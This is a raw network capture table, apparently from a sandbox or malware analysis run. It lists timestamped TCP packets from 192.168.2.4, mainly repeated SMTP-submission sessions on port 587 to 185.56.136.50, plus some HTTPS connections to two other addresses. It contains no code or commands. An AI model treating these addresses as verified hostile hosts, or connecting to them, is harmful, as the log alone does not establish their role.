Jan 24, 2024 21:32:07.435283899 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:07.437074900 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:07.438446045 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:07.647855997 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:07.648838043 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:07.858093023 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:07.858362913 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:08.068078041 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:08.069081068 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:08.284673929 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:08.284892082 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:08.494110107 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:08.494323015 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:08.716823101 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:08.717303991 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:08.926929951 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:08.928796053 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:08.928848028 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:08.928889036 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:08.928937912 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:08.929049015 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:08.929109097 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:08.929158926 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:08.929192066 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:08.929224014 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:09.137926102 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:09.137981892 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:09.138032913 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:09.138066053 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:09.138101101 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:09.138297081 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:09.138330936 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:09.141417980 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:09.167087078 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:09.377397060 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:09.413773060 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:09.506274939 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:09.712249994 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:09.712519884 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:09.930634975 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:09.999217987 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:10.004050016 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:10.210422993 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:10.210701942 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:10.417320013 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:10.467889071 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:11.254950047 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:11.471997976 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:11.472078085 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:11.472116947 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:11.472157955 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:11.472251892 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:11.472251892 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:11.473716974 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:11.474993944 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:11.680748940 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:11.730130911 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:11.881499052 CET	49736	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:11.881561995 CET	443	49736	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:11.881622076 CET	49736	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:11.881871939 CET	49736	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:11.882031918 CET	443	49736	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:11.882077932 CET	49736	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:11.907756090 CET	49737	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:11.907800913 CET	443	49737	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:11.908087015 CET	49737	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:11.909573078 CET	49737	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:11.909651041 CET	443	49737	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:11.935770988 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:11.936089039 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:12.142004967 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:12.142381907 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:12.289799929 CET	443	49737	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:12.289947033 CET	49737	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:12.291230917 CET	49737	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:12.291256905 CET	443	49737	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:12.291667938 CET	443	49737	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:12.341165066 CET	49737	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:12.353693008 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:12.354163885 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:12.354451895 CET	49737	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:12.397919893 CET	443	49737	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:12.560038090 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:12.560728073 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:12.635463953 CET	443	49737	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:12.635647058 CET	443	49737	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:12.635710955 CET	49737	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:12.635837078 CET	49737	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:12.635863066 CET	443	49737	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:12.635885954 CET	49737	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:12.635895014 CET	443	49737	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:12.779268026 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:12.779556990 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:12.985208035 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:12.985569954 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:12.985569954 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:12.985569954 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:12.985630035 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:13.191256046 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:13.191309929 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:13.191344023 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:13.191401005 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:13.375401020 CET	587	49735	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:13.428163052 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:16.300978899 CET	49744	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:16.301062107 CET	443	49744	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:16.301153898 CET	49744	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:16.314755917 CET	49744	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:16.314832926 CET	443	49744	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:16.791501999 CET	443	49744	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:16.791656971 CET	49744	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:16.793349981 CET	49744	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:16.793401957 CET	443	49744	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:16.793942928 CET	443	49744	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:16.834954977 CET	49744	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:16.869088888 CET	49744	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:16.909907103 CET	443	49744	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:17.092696905 CET	443	49744	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:17.092962027 CET	443	49744	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:17.093139887 CET	49744	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:17.096484900 CET	49744	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:18.014997005 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:18.220320940 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:18.220524073 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:18.434108973 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:18.434583902 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:18.639543056 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:18.639930010 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:18.838684082 CET	49746	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:18.838732958 CET	443	49746	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:18.838794947 CET	49746	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:18.839015007 CET	49746	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:18.839072943 CET	443	49746	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:18.839128971 CET	49746	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:18.845571995 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:18.846415997 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:18.864650011 CET	49747	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:18.864701986 CET	443	49747	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:18.864869118 CET	49747	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:18.866498947 CET	49747	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:18.866517067 CET	443	49747	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:18.939419985 CET	49735	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:19.061903954 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:19.061965942 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:19.062005043 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:19.062043905 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:19.062083960 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:19.062164068 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:19.063944101 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:19.065905094 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:19.256584883 CET	443	49747	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:19.256680965 CET	49747	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:19.260818958 CET	49747	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:19.260848999 CET	443	49747	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:19.261240005 CET	443	49747	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:19.270694971 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:19.279431105 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:19.304071903 CET	49747	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:19.335855007 CET	49747	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:19.377929926 CET	443	49747	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:19.484194994 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:19.484513044 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:19.689707994 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:19.690062046 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:19.722973108 CET	443	49747	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:19.723086119 CET	443	49747	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:19.723217010 CET	49747	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:19.723531008 CET	49747	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:19.723577976 CET	443	49747	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:19.723609924 CET	49747	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:32:19.723624945 CET	443	49747	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:19.900516987 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:19.900851011 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:20.105428934 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:20.105748892 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:20.323106050 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:20.323394060 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:20.528069019 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:20.528737068 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:20.528821945 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:20.528902054 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:20.528902054 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:20.733381987 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:20.733423948 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:20.733448029 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:20.733470917 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:20.737014055 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:20.789099932 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:20.836612940 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:21.042064905 CET	587	49745	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:21.042823076 CET	49745	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:21.045650959 CET	49749	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:21.250106096 CET	587	49749	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:21.250401974 CET	49749	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:21.463428020 CET	587	49749	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:21.463587046 CET	49749	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:21.668500900 CET	587	49749	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:21.671657085 CET	49749	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:21.877394915 CET	587	49749	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:21.882932901 CET	49749	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:22.099129915 CET	587	49749	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:22.099190950 CET	587	49749	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:22.099236012 CET	587	49749	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:22.099272013 CET	587	49749	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:22.099287033 CET	49749	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:22.099318027 CET	49749	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:22.101140022 CET	587	49749	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:22.102694035 CET	49749	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:22.307394981 CET	587	49749	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:22.308501959 CET	49749	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:22.513139009 CET	587	49749	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:22.568070889 CET	49749	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:23.036211014 CET	49750	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:23.036262989 CET	443	49750	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:23.036320925 CET	49750	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:23.056061983 CET	49750	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:23.056094885 CET	443	49750	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:23.530635118 CET	443	49750	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:23.530720949 CET	49750	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:23.532586098 CET	49750	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:23.532598972 CET	443	49750	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:23.533129930 CET	443	49750	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:23.584356070 CET	49750	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:23.610518932 CET	49750	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:23.657902002 CET	443	49750	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:23.831450939 CET	443	49750	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:23.831631899 CET	443	49750	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:23.831690073 CET	49750	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:23.834969997 CET	49750	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:24.870354891 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:25.072422028 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:25.072633982 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:25.291779995 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:25.291975021 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:25.311688900 CET	49749	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:25.494040966 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:25.495248079 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:25.698338985 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:25.698859930 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:25.911951065 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:25.911974907 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:25.911981106 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:25.911987066 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:25.912444115 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:25.914558887 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:25.918018103 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:26.120102882 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:26.125968933 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:26.328105927 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:26.328495026 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:26.531121969 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:26.533369064 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:26.741177082 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:26.741589069 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:26.943375111 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:26.943671942 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:27.161727905 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:27.170573950 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:27.372648954 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:27.373306036 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:27.373361111 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:27.373395920 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:27.373429060 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:27.575148106 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:27.575306892 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:27.575428009 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:27.575439930 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:27.580936909 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:27.631310940 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:27.766974926 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:27.971088886 CET	587	49751	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:27.971632957 CET	49751	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:27.972767115 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:28.175512075 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:28.175724030 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:28.391747952 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:28.443738937 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:29.414364100 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:29.617675066 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:29.617830992 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:29.822175980 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:29.822504044 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:30.036643982 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:30.036672115 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:30.036685944 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:30.036700964 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:30.036756992 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:30.036834002 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:30.038589001 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:30.039944887 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:30.243181944 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:30.244106054 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:30.447395086 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:30.447730064 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:30.651494026 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:30.651804924 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:30.860991001 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:30.861238956 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:31.064228058 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:31.064543009 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:31.280677080 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:31.280872107 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:31.484194040 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:31.484648943 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:31.484705925 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:31.484749079 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:31.484791994 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:31.484901905 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:31.484958887 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:31.485008001 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:31.485049009 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:31.485085011 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:31.687556982 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:31.687575102 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:31.687587976 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:31.687625885 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:31.687638998 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:31.687817097 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:31.687870979 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:31.691236019 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:31.737427950 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:31.941103935 CET	587	49752	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:31.941458941 CET	49752	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:31.942888975 CET	49753	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:32.151849985 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:32.151961088 CET	49753	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:32.375822067 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:32.376234055 CET	49753	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:32.585372925 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:32.585629940 CET	49753	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:32.795686960 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:32.796087980 CET	49753	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:33.016165972 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:33.016185045 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:33.016196012 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:33.016207933 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:33.016366959 CET	49753	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:33.016366959 CET	49753	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:33.018265009 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:33.019783020 CET	49753	587	192.168.2.4	185.56.136.50
